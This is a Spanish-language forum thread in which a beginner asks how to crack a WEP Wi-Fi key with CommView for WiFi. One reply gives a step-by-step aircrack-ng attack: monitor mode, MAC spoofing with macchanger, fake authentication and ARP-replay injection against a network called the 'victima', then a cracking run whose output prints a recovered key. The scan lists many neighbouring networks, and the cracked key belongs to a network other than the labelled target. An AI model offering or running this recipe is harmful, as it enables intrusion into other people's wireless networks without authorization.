Autor
|
Tema: Drivers Commview for wifi bradcom (Leído 10,902 veces)
|
Sawem
Desconectado
Mensajes: 11
|
hola,para empezar tengo que decir que soy muy novato,de echo ayer mismo empeze a intentar descrifrar mi clave wep.
pero como es logico,me surjen varios problemas:
actualmente utilizo windows 7 con una tarjeta de red Broadcom,instale el commview for wifi 6.3 ,mi tarjeta es compatible con el programa pero no puede inyectar,instalo los driver que trae el programa y cuando los voy a instalar me dice que la instalacion no puede finalizar,cuando termino todo eso he intento utilizar el programa me sale un pantallazo azul con un crash dump,es decir cada vez que intento utilizar la tarjeta de red me da error,como puedo solucionar esto?
otra duda que me surje:
cuando me pongo a recopilar paquetes en una hora he conseguido unos 115.000 cuando los guardo para utilizarlos con el aircrack me dice que ha guardado unos 1000 paquetes, por que si consigo unos 115.000 paquetes despues me guarda menos?
tambien consigo muy pocos isv,cuando utilizo el aircrack para descifrar la clave me dice que tengo unos 540 isv y creo que lo minimo son 5000,como puedo conseguir mas isv? consigo tan pocos por que no inyecto trafico?
muchas gracias y un saludo?
|
|
|
En línea
|
|
|
|
ruben_linux
|
Este tema esta muuy tratado pero... Si necesitas generar más trafico, igual que esto. Este ejercicio esta realizado en un HP dv6 2145es con wifi atheros AR9285 802.11b/g/n Siguiendo estos pasos no tendremos problemas en descubrir claves, solo es cuestion de tiempo en 2h seguro que la tenemos. ********************************** sudo airmon-ng start wlan0 --> establece modo monitor el dispositivo wlan0 y lo convierte en mon0 [sudo] password for ruben:
Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
PID Name 957 avahi-daemon 959 avahi-daemon 960 NetworkManager 1037 wpa_supplicant
Interface Chipset Driver
wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0) ******************************** sudo ifconfig mon0 down --> tenemos que desactivarlo para poder cambiar la MAC ******************************** sudo macchanger -r mon0 --> cambio de MAC (-r) establece una MAC aleatoria (RANDOM) Current MAC: 78:e4:00:1c:**:** (unknown) Faked MAC: 98:ea:6f:be:**:** (unknown) ********************************** sudo ifconfig mon0 up --> activamos el dispositivo ************************************** sudo airodump-ng --ivs -w captura_ivs mon0 --> airodump-ng captura las ivs en el archivo captura_ivs ************************************* sudo aireplay-ng -1 0 -a 00:13:F7:E6:**:** -h 98-EA-6F-BE-**:** -e WLAN636153 mon0 --> estaclecemos una conexion con la victima -a victima -h nos 13:08:47 Waiting for beacon frame (BSSID: 00:13:F7:E6:**.**) on channel 2 13:08:47 Sending Authentication Request (Open System) [ACK] 13:08:47 Authentication successful 13:08:47 Sending Association Request [ACK] 13:08:47 Association successful :-) (AID: 1) ************************************************* sudo aireplay-ng -3 -b 00:13:F7:E6:**:** -h 98-EA-6F-BE-**:** -x 700 mon0 --> injeccion de paquetes -b victima -h nos -x nº de paquetesxsegundo 13:11:14 Waiting for beacon frame (BSSID: 00:13:F7:E6:**:**) on channel 2 Saving ARP requests in replay_arp-0824-131114.cap You should also start airodump-ng to capture replies. ^Cad 529 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) ************************************************* sudo aireplay-ng -3 -b 00:13:F7:E6:**:** -h 98-EA-6F-BE-**:** -x 700 mon0 --> ya esta injectando, el resultado se guarda en replay_arp-0824-131221.cap 13:12:21 Waiting for beacon frame (BSSID: 00:13:F7:E6:**:**) on channel 2 Saving ARP requests in replay_arp-0824-131221.cap You should also start airodump-ng to capture replies. Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? ^Cad 239147 packets (got 1 ARP requests and 11492 ACKs), sent 217046 packets...(699 pps) ********************************* sudo aircrack-ng captura_ivs.ivs ********************************* Read 40762 packets.
# BSSID ESSID Encryption
1 00:01:38:FA:**:** WLAN_6C Unknown 2 00:01:38:D0:**:** WLAN_F9 WEP (3 IVs) 3 E0:91:53:09:**:** WLAN_56 Unknown 4 00:22:F7:0E:**:** W-Real Unknown 5 00:01:38:D0:**:** WLAN_07 WEP (40331 IVs) 6 00:13:F7:E6:**:** WLAN636153 WEP (370 IVs) 7 00:26:18:10:**:** R-WLAN1C Unknown 8 00:18:9B:3F:**:** Rwlan-11 Unknown 9 00:18:9B:40:**:** MARCOS Unknown 10 00:27:19:E1:**:** busi Unknown 11 00:22:15:1C:**:** R-wlan2 Unknown 12 00:01:38:E4:**:** WLAN_ED Unknown 13 00:26:4D:72:**:** WEP (2 IVs) 14 00:18:9B:05:**:** THOMSON Unknown 15 00:23:4D:92:**:** PS3-5513993 Unknown 16 00:21:27:E4:**:** WIFITP WEP (34 IVs) 17 00:22:3F:07:**:** anaconda Unknown 18 00:01:38:FD:**:** WLAN_40 Unknown 19 E0:91:53:17:**:** WLAN_EC Unknown 20 00:01:38:DF:**:** WLAN_70 Unknown 21 00:1B:2F:F2:**:** NETGEAR Unknown 22 00:22:2D:04:**:** Unknown 23 00:22:6B:95:**:** RB Unknown
Index number of target network ? ********************************* Aircrack-ng 1.0
[00:00:00] Tested 148530 keys (got 40331 IVs)
KB depth byte(vote) 0 0/ 1 58(53024) D0(47880) C4(47264) 5D(46788) AE(46336) C7(46232) 60(45644) 31(45572) 5B(45556) B4(45356) 9F(45316) CF(45312) 8B(45152) 1 0/ 1 30(48988) 09(47384) 8F(47352) CA(46644) 38(46416) FF(45980) 94(45976) 5F(45772) 41(45592) 43(45576) A5(45476) CC(45472) F8(45436) 2 0/ 1 30(54636) 3C(48456) 7F(47388) 5D(46796) 17(46560) E9(46340) DC(45984) 53(45948) 2F(45880) 46(45716) 2A(45556) E0(45324) A5(45320) 3 0/ 1 30(49616) AF(47544) 7A(47520) 74(46212) 19(46100) 9A(46036) 23(46020) DD(45816) 7E(45756) 8F(45428) 57(45248) 7B(45104) 26(44880) 4 0/ 2 E5(49204) 19(49096) F4(47376) 52(46888) 15(46652) 08(46024) 5C(45900) B2(45396) 5E(44852) 90(44852) 13(44804) DF(44804) E3(44784) 5 0/ 2 33(47576) C6(47480) D5(46860) CE(46752) 06(46344) 49(46276) BC(46248) 00(46240) FA(46196) 4F(46164) 37(45984) 4D(45716) 51(45716) 6 0/ 1 38(48852) A5(46888) 0A(46832) F0(46756) 81(46708) 9D(46500) 6F(46496) 3A(45492) 10(45212) 64(45104) 19(45012) AE(44892) 1D(44848) 7 0/ 1 44(52656) BA(47640) C2(47012) 4D(46612) 62(46460) 3F(45980) 0A(45880) 56(45876) CC(45840) 66(45828) C0(45428) 71(45284) 3D(45212) 8 0/ 1 31(49004) A3(47300) E5(47008) 23(46752) AB(46584) C9(46452) 1E(46356) 03(46224) 09(45796) 31(45628) E7(45428) 75(45372) 6D(45272) 9 0/ 1 43(54100) D9(49584) 65(48548) D3(48292) 8B(48116) 18(47452) 68(46880) 1C(46260) B8(46196) 53(45440) 1B(45152) D0(45140) 01(45024) 10 0/ 1 C7(48844) 79(47452) DF(46748) DE(46372) B2(46348) 0C(46204) 93(46132) 38(46024) C0(46012) 40(45652) 15(45360) 29(45172) 6E(45152) 11 0/ 1 0C(47296) 9F(47220) 9A(47068) 29(46832) FE(46572) 3C(46276) 4E(46012) 7C(45952) 17(45872) EC(45692) 8A(45440) DB(45240) AD(45108) 12 0/ 1 37(56992) 9E(47800) 68(47372) 39(47080) C4(46704) 44(46644) 2E(46428) E0(46280) CA(46088) F8(45956) D2(45628) E5(44768) 4A(44760)
KEY FOUND! [ 58:30:30:30:31:33:38:44:31:43:44:30:37 ] (ASCII: X000138D1CD07 ) Decrypted correctly: 100%
|
|
|
En línea
|
|
|
|
Sawem
Desconectado
Mensajes: 11
|
Hola,yo actualmente trabajo bajo windows 7,asi que ese tipo de intrucciones ahora mismo no me sirven,de todas formas poseo un neetbook con linux y tarjeta de red atheros cuando lo tenga disponible aplicare todo lo que me has dicho,muchas gracias por tu respuesta,un saludo.
|
|
|
En línea
|
|
|
|
ruben_linux
|
el guion es el mismo a seguir en win2 que en Linux
|
|
|
En línea
|
|
|
|
Sawem
Desconectado
Mensajes: 11
|
hola,yo soy muy novato y preferiria utilizar el commview para capturar paquetes y el aircrack para descrifarlos,lo unico que necesito es poder inyectar con mi tarjeta.
lo que tu has puesto no se ni como empezar a utilizarlo,cuando empieza a manejar un poco mas esto del mundo wireless seguramente me vendra perfecto.
un saludo y muchas gracias.
|
|
|
En línea
|
|
|
|
Sawem
Desconectado
Mensajes: 11
|
He estado buscando por ahi y he visto que he existe un driver que se llama BRCM que permite poner a Broadcom en modo monitor,lo que pasa es que no consigo encontrar un sitio de donde descargarlo,a ver si alguien me puede ayudar.
llevo 3 horas recogiendo paquetes y solo he conseguido 834 IVs,vamos que con eso no tengo practicamente ni para descubrir una letra.
muchas gracias y un saludo.
|
|
|
En línea
|
|
|
|
Sawem
Desconectado
Mensajes: 11
|
tengo otro problema,he conseguido poner un adaptador usb belkin en modo monitor,pero cuando ejecuto el commview for wifi he intento buscar redes no me deja hacerlo,el programa me dice que no se seleccionaron canales para explorar,si lo intento hacer manualmente me sale en blanco las opciones de banda y canal,que puedo hacer?
muchas gracias y un saludo.
|
|
|
En línea
|
|
|
|
Alberyliam
Desconectado
Mensajes: 10
|
Primero Ruben todo eso es bajo linux y el pregunta sobre el commview for wifi que es bajo Windows.....no entiendo porque has puesto todo el proceso de hacking bajo Linux, a no ser que sea para demostrar que con no muchos Ivs puedes sacar key found...pero bueno, es igual. Según lo poco que he caminado con Commview for wifi, puedo decirte que primero dependiendo de la calidad de la recepción del wifi y la distancia del router cliente iras mas rapido o mas lento, es decir subiran mas rapido paquetes y datas. Despues, dejalo trabajando mucho tiempo, o haz varias capturas mas menos cortas, y unelos todos, porque debes tener en cuenta QUE EL PROGRAMA ES DE EVALUACION Y SOLO TE CUENTA EL 50% DE LOS DATOS, asi que si tienes 500.000 en realidad solo tienes 250.000. Y Mi chipset tampoco me permite inyectar creo, no se si es cosa del programa. Yo al final consegui sacar mi key, fue por pillar datos a mazo. Ademas si es portatil mas lento pillaras.
|
|
|
En línea
|
|
|
|
|
|